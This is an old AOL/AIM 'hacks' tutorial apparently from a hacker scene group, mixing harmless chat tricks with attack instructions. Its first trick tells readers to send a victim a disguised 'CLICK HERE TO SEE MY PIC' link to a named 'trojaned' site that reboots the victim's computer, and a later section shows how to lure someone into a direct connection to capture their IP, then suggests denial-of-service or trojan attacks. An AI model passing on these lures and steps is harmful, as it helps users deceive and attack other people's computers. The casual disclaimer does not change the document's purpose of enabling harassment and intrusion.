DISCLAMER:
I AM NOT RESPONSIBLE for any stupid things u do with these tricks
SO MAKE SURE YOU USE IT JUST FOR FUN AND NOT FOR MALICIOUS PURPOSES (IT CAN 
BE USED FOR MALICIOUS PURPOSES ;) ).

===============================================================================================
»TO SEE THE DIAGRAM CLEARLY COPY THE TEXT INTO YOUR NOTEPAD AND SELECT 
"Fixedsys" FONT

===============================================================================================

*AOL HACKS*:
Well in this tutorial: I am going to teach YOU some of the secrets of AOL or 
AIM (America Online Chat messenger service).
Infact it is a service provided to people to send and recieve messages.And 
it is secure too.But It had got some vulrenbilities (dont mind 
spelling).Well i am not going to discuss those flaws but to teach you some 
of the hacks of AOL..

SO FOLLOW ME:

______________________________________________________________________________________________+


*=>SO YOU WANT TO BURST SOMEONE ON AOL WHO IS TEASING YOU:
SO WHAT ARE YOU WAITING FOR:

When you are talking to someone told him politely that you want to show him 
your picture etc=> (I mean a file).Now he says Okay...
go straight to the "LINK" Icon its near the "SIMILEY" icon and click it

Now in the upper portion write http://nraziz.tripod.com/nraziz.html
and in the lower portion write "CLICK HERE TO SEE MY PIC"..
NOW CLICK ON THE SEND BUTTION OR SIMPLY HIT THE RETURN KEY..
AFTER SOMETIME HE WILL BE NOT ONLINE BECAUSE YOU HAVE REBOOTED HIS COMPUTER  
BY MY SITE (http://nraziz.tripod.com/nraziz.html).Never try this site on 
your own computer ...Because its  a trojaned based site.

You can use this site any where on MSN,YAHOO,IRC ETC..;)

OKAY

WANT TO KNOW SOME MORE SECRETS ?

OKAY nAUGHTY hERE yA gO

______________________________________________________________________________________________+


*=>  You can send a line a black blank line to any one on aol by Pressing 
Ctrl+h :)


______________________________________________________________________________________________+


*=>  Now its time for the most liked trick and it works ;-)

so  you want to make someone astonish and surprise ? by talking to him on 
his screen name
thats not too hard you can do it easily but you need to have a little piece 
of mind in your head..

Now when you are talking to someone
copy his screen name by highlighting his screen name and simply pressing 
Ctrl+C.
Now when you have copied it bring it to your message box and paste it 
carefully now place the cursor behind it and move it (By pressing "space key 
"for sometime until it comes to the next line  and then Hit return key or 
click send button.. Now you have done the trick..

§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§

DIAGRAM FOR THE ABOVE TRICK

/-----------------\
|_________________|
|		  |
|jaos8:hi (my sn) |
|someone: hi      |
|                 |
|                 |  jaos8 is my screen name thats why I have used it here..
|                 |
|		  |
|-----------------|
|message (asl etc)|
|someone:200/m/Mars      =>HIS SCREEN NAME COPIED AND PLACED ON THE NEXT 
LINE
-------------------
|BLOCK•	     SEND•|
-------------------

it will look like this:
|_________________|
|		  |
|jaos8:hi (my sn) |
|		  |
|someone: hi      |
|                 |
|jaos8:asl ?      |
|                 |
|someone:200/mARS |
|-----------------|
|THEN YOU SAY SOME|
|THING            |
-------------------
|BLOCK•	     SEND•|
-------------------

______________________________________________________________________________________________+

*=> (***SECRET***)

THIS IS A SECRET BECAUSE most of YOU dont know IT .
RIGHT

»tHIS secret is really interesting«

if you want to place  your SCREEN NAME and your NAME in the buddy lists of 
those who visits your profile..
then its easy
simply in your profile
click on the link icon and then
in the upper portion write 
"aim:addbuddy?screenname=YOUrSCREENnAME&groupname=YOUrnAME"

SOME OF YOU STUPIDS WRITE DOUBLE QUOTES WHICH IS NOT A GOOD SIGN :)

______________________________________________________________________________________________+

*=>
**Another kewl Trick**

Well some of you might know about this tRiCK because its not a secret ..
By Putting " %n " (Without quotes) in your profile ..When somebody is view 
your profile he will see his screen name instead of %n like
hi %n
will look like
hi jaos8 (my screen name )

»%t for time

»%d for date

^|^ yOU can send simileys by simply typing things like this:
---

:) ,  ;) ,  :( ,  ;(  ,  :D , 8)     (TRY OTHERS YOUR SElf) :/

_____________________________________________________________________________________________+

*=> FINDING SOMEONE'S IP ON AIM :

tHIs is not as difficult as you think.
If you want to get someone's IP on AIM(AOL INSTANT MESSENGER).
Go to MSDOS and type " Netstat -an>c:\1.txt " . Now All you have to do is to 
make a direct connection to the person you want to get IP .(You can make 
direct connection by sending him a file or picture ).Now while you are 
directly connected again move to MSDOS and type "Netstat -an>c:\2.txt " 
.Okay so now compare both 1.txt and 2.txt ( 1  & 2.txt are in C DRIVE) .The 
IP which is not in 1 but in 2.txt is the IP of the person...
Should I make it further simple for you?
okay now instead of Netstat -an>c:\1.txt You can also write Netstat -a>c:\1 
OR 2.txt
You will get something like "aol.something.something"  AND SOME PORT HERE. 
Usually buddies are
talking to you on port 5090 or 5190 so if you got port like this then you 
must be sure that you got his IP..

Netstat -a(n)=>n prints all the connections in Numerical form..

You have to make a direct connection to that person by sending him a file or 
picture..After you've made direct connection


I got his IP what can I do now....? :)

Well if you are so lamer that you dont know what to do with the IP then why 
you learned this stuff .
Well I will give you some hints what you can do with the IP.

DOS ATTACK (DENIAL OF SERVICE)
WHOIS LOOKUP (IF YOU WANT TO GET SOME INFORMATION)
ATTACK WITH TROJAN (WHAT LAMERS DO)
AND lots more MORE........n

______________________________________________________________________________________________+

*=> AIM CLONNING OR SIGNING WITH MULTI SCREEN NAMES ;)

I think Its an interesting part of these tricks

There are also many kinds of software for this purpose like AIM CLONE which 
is used by lamers.

Okay you want to sign with many aol screen names :) okay then follow me:-

=>Ist Screen Name:

sign in with your AOL Messenger .

=>2nd Screen Name:


Now visit :- http://toc.oscar.aol.com/tic.html and sign on


=>3rd Screen Name:

GOto http://www.aol.com/aim/aimexpress.html and sign on which is to be your 
Third screen name.

WOW yOU Got three conections on aol .
Well If you still want more just download AIM CLONE .

______________________________________________________________________________________________+

These are all harmless tricks and secrets but if you want to know some 
really dangerous then email me ..
I WILL PUBLISH SOME TUTORIALS AND TEXTS ABOUT batch,email 
hacking»tweaking»spaming¤faking,windows hacking,MSN 
HACKING,TCP/IP,ANONYMITY,SOCKETS ETC..
SO KEEP IN TOUCH WITH *EBCVG*

FORGIVE ME FOR SPELLING MISTAKES GRAMMATICAL MISTAKES ETC BECAUSE I AM 
WRITING THIS TUTORIAL IN 95 W.P.M (WORDS PER MINUTE)
HEHEHE...

WELL THATS ALL FOR NOW I HAVE GOT SOME MORE TRICKS TOO BUT I AM TIRED.
WANT TO EMAIL ME :
			cyberghost4@hotmail.com

»If you want to add me to your msn :dewdrop66@hotmail.com you can use this 
address <==


^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^



